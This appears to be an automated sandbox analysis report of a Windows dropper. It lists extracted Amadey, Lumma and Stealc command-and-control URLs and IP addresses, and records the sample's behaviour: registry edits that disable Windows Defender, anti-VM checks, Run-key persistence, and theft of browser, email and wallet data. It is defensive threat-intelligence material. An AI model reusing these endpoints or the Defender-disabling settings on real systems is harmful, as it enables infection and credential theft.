Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
125s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
07/03/2025, 16:07
Static task
static1
General
-
Target
3257a90914b6dfdb338969b2a58a260a.exe
-
Size
5.5MB
-
MD5
3257a90914b6dfdb338969b2a58a260a
-
SHA1
8760b6b9e7412e1346b5427a0e92e7399d226561
-
SHA256
8b91be73c8fdc9e0d3f9771945bd8d6cead01382bf4b9c68fd056047c7249b8f
-
SHA512
a7bfee3fc1c5b1a7a107a2fd80ec8474ec05adbf4f5557dafd820699690baf266ebc0dd53abd278d98950f746438dd9f96a2ee2bf29c3a68cf048daec61a6258
-
SSDEEP
98304:w4HFD2LWvXJq/8y2ccr9+MXamXXbkxvWTioIqqUt0p3CkyVulQqc/ABiJk:HcSvUMccrx9XLkqIqqUSpncDFABi
Malware Config
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://defaulemot.run/api
https://begindecafer.world/api
https://garagedrootz.top/api
https://modelshiverd.icu/api
https://arisechairedd.shop/api
https://fcatterjur.run/api
https://orangemyther.live/api
https://fostinjec.today/api
https://6sterpickced.digital/api
https://dawtastream.bet/api
https://foresctwhispers.top/api
https://tracnquilforest.life/api
https://xcollapimga.fun/api
https://strawpeasaen.fun/api
https://jquietswtreams.life/api
https://starrynsightsky.icu/api
https://earthsymphzony.today/api
https://xexarthynature.run/api
https://hardswarehub.today/api
https://gadgethgfub.icu/api
https://shardrwarehaven.run/api
https://techmindzs.live/api
https://bcodxefusion.top/api
https://quietswtreams.life/api
https://techspherxe.top/api
https://9garagedrootz.top/api
https://catterjur.run/api
https://sterpickced.digital/api
https://nebdulaq.digital/api
https://acatterjur.run/api
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
stealc
traff1
-
url_path
/gtthfbsb2h.php
Extracted
lumma
https://exarthynature.run/api
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/5996-991-0x0000000000B70000-0x0000000000E28000-memory.dmp healer behavioral1/memory/5996-990-0x0000000000B70000-0x0000000000E28000-memory.dmp healer behavioral1/memory/5996-1023-0x0000000000B70000-0x0000000000E28000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 0876cf74dd.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 0876cf74dd.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 0876cf74dd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 0876cf74dd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 0876cf74dd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 0876cf74dd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 0876cf74dd.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 0876cf74dd.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 0876cf74dd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 0876cf74dd.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2R0700.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ebcf281f33.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0876cf74dd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bncn6rv.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f2f8df5acc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f266eb5780.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8CKO89S7RFEHT4LV2KHUEN5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FvbuInU.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1E08u3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3E11p.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a26361a646.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 07a3928e11.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3572 powershell.exe 2664 powershell.exe 2292 powershell.exe 6948 powershell.exe 6712 powershell.exe 3572 powershell.exe 6948 powershell.exe 5292 powershell.exe -
Downloads MZ/PE file 26 IoCs
flow pid Process 70 3512 BitLockerToGo.exe 76 4368 rapes.exe 76 4368 rapes.exe 76 4368 rapes.exe 76 4368 rapes.exe 35 3132 2R0700.exe 219 4368 rapes.exe 52 4872 BitLockerToGo.exe 242 4368 rapes.exe 242 4368 rapes.exe 242 4368 rapes.exe 242 4368 rapes.exe 242 4368 rapes.exe 242 4368 rapes.exe 242 4368 rapes.exe 244 4196 bncn6rv.exe 244 4196 bncn6rv.exe 244 4196 bncn6rv.exe 244 4196 bncn6rv.exe 244 4196 bncn6rv.exe 244 4196 bncn6rv.exe 244 4196 bncn6rv.exe 33 4368 rapes.exe 96 536 07a3928e11.exe 42 4368 rapes.exe 42 4368 rapes.exe -
Uses browser remote debugging 2 TTPs 15 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4656 chrome.exe 6524 chrome.exe 6288 chrome.exe 3420 msedge.exe 3196 msedge.exe 6964 chrome.exe 6312 msedge.exe 5452 msedge.exe 5720 msedge.exe 6644 chrome.exe 5888 chrome.exe 4864 msedge.exe 2448 chrome.exe 5136 chrome.exe 6316 chrome.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x000700000002428f-2959.dat net_reactor behavioral1/memory/3440-2983-0x0000000000AF0000-0x0000000000B50000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 32 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f266eb5780.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f266eb5780.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1E08u3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 07a3928e11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 07a3928e11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8CKO89S7RFEHT4LV2KHUEN5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bncn6rv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f2f8df5acc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ebcf281f33.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ebcf281f33.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8CKO89S7RFEHT4LV2KHUEN5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2R0700.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bncn6rv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1E08u3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a26361a646.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0876cf74dd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0876cf74dd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3E11p.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2R0700.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3E11p.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a26361a646.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f2f8df5acc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation 1E08u3.exe Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation rapes.exe -
Executes dropped EXE 28 IoCs
pid Process 4992 A7B94.exe 1080 1E08u3.exe 4368 rapes.exe 3132 2R0700.exe 2460 HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe 776 3E11p.exe 2576 a26361a646.exe 4836 ebcf281f33.exe 3508 f2f8df5acc.exe 856 7be4314deb.exe 3452 7be4314deb.exe 2508 rapes.exe 536 07a3928e11.exe 228 f266eb5780.exe 1136 8CKO89S7RFEHT4LV2KHUEN5.exe 4160 9dd5ebb048.exe 5996 0876cf74dd.exe 5528 PQkVDtx.exe 6384 COM Surrogate.exe 2596 packed.exe 6140 rapes.exe 4196 bncn6rv.exe 3440 mAtJWNv.exe 6420 mAtJWNv.exe 6604 HmngBpR.exe 7036 SplashWin.exe 384 SplashWin.exe 5984 FvbuInU.exe -
Identifies Wine through registry keys 2 TTPs 16 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine 8CKO89S7RFEHT4LV2KHUEN5.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine 0876cf74dd.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine a26361a646.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine ebcf281f33.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine FvbuInU.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine 1E08u3.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine 2R0700.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine f2f8df5acc.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine f266eb5780.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine 07a3928e11.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine bncn6rv.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine 3E11p.exe -
Loads dropped DLL 9 IoCs
pid Process 7036 SplashWin.exe 7036 SplashWin.exe 7036 SplashWin.exe 7036 SplashWin.exe 384 SplashWin.exe 384 SplashWin.exe 384 SplashWin.exe 4196 bncn6rv.exe 4196 bncn6rv.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 0876cf74dd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 0876cf74dd.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 3257a90914b6dfdb338969b2a58a260a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" A7B94.exe Set value (str) \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\07a3928e11.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10126650101\\07a3928e11.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f266eb5780.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10126660101\\f266eb5780.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9dd5ebb048.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10126670101\\9dd5ebb048.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0876cf74dd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10126680101\\0876cf74dd.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Uninstall 43.053.0058.0001 = "C:\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.YourPhone_3wekyb108bbwe\\opt\\YourPhone.exe" COM Surrogate.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000c000000023bf2-223.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 7084 tasklist.exe 2204 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
pid Process 1080 1E08u3.exe 4368 rapes.exe 3132 2R0700.exe 2460 HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe 776 3E11p.exe 2576 a26361a646.exe 4836 ebcf281f33.exe 3508 f2f8df5acc.exe 2508 rapes.exe 536 07a3928e11.exe 228 f266eb5780.exe 1136 8CKO89S7RFEHT4LV2KHUEN5.exe 5996 0876cf74dd.exe 6140 rapes.exe 4196 bncn6rv.exe 5984 FvbuInU.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2576 set thread context of 4872 2576 a26361a646.exe 101 PID 856 set thread context of 3452 856 7be4314deb.exe 106 PID 4836 set thread context of 3512 4836 ebcf281f33.exe 105 PID 3440 set thread context of 6420 3440 mAtJWNv.exe 183 PID 384 set thread context of 5376 384 SplashWin.exe 218 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\runtime\COM Surrogate.exe PQkVDtx.exe File created C:\Program Files\runtime\COM Surrogate.exe packed.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job 1E08u3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 3044 856 WerFault.exe 104 6516 3440 WerFault.exe 179 6080 6604 WerFault.exe 238 -
System Location Discovery: System Language Discovery 1 TTPs 38 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3257a90914b6dfdb338969b2a58a260a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0876cf74dd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1E08u3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3E11p.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9dd5ebb048.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bncn6rv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 07a3928e11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 9dd5ebb048.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f2f8df5acc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8CKO89S7RFEHT4LV2KHUEN5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FvbuInU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a26361a646.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ebcf281f33.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f266eb5780.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language A7B94.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2R0700.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7be4314deb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7be4314deb.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 9dd5ebb048.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 13 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 bncn6rv.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString bncn6rv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Enumerates system info in registry 2 TTPs 10 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer PQkVDtx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer packed.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe -
Kills process with taskkill 5 IoCs
pid Process 5004 taskkill.exe 4004 taskkill.exe 2372 taskkill.exe 2664 taskkill.exe 2460 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133858373546368034" chrome.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings rapes.exe Key created \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1296 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1080 1E08u3.exe 1080 1E08u3.exe 4368 rapes.exe 4368 rapes.exe 3132 2R0700.exe 3132 2R0700.exe 3132 2R0700.exe 3132 2R0700.exe 3132 2R0700.exe 3132 2R0700.exe 2460 HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe 2460 HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe 776 3E11p.exe 776 3E11p.exe 2576 a26361a646.exe 2576 a26361a646.exe 4836 ebcf281f33.exe 4836 ebcf281f33.exe 3508 f2f8df5acc.exe 3508 f2f8df5acc.exe 2508 rapes.exe 2508 rapes.exe 3452 7be4314deb.exe 3452 7be4314deb.exe 3452 7be4314deb.exe 3452 7be4314deb.exe 536 07a3928e11.exe 536 07a3928e11.exe 536 07a3928e11.exe 536 07a3928e11.exe 536 07a3928e11.exe 536 07a3928e11.exe 228 f266eb5780.exe 228 f266eb5780.exe 1136 8CKO89S7RFEHT4LV2KHUEN5.exe 1136 8CKO89S7RFEHT4LV2KHUEN5.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 5996 0876cf74dd.exe 5996 0876cf74dd.exe 5996 0876cf74dd.exe 5996 0876cf74dd.exe 5996 0876cf74dd.exe 6712 powershell.exe 6712 powershell.exe 6712 powershell.exe 6996 powershell.exe 6996 powershell.exe 6996 powershell.exe 3572 powershell.exe 3572 powershell.exe 3572 powershell.exe 6456 powershell.exe 6456 powershell.exe 6456 powershell.exe 2664 powershell.exe 2664 powershell.exe 6652 powershell.exe 6652 powershell.exe 2664 powershell.exe 6652 powershell.exe 2292 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 384 SplashWin.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 4864 msedge.exe 4864 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
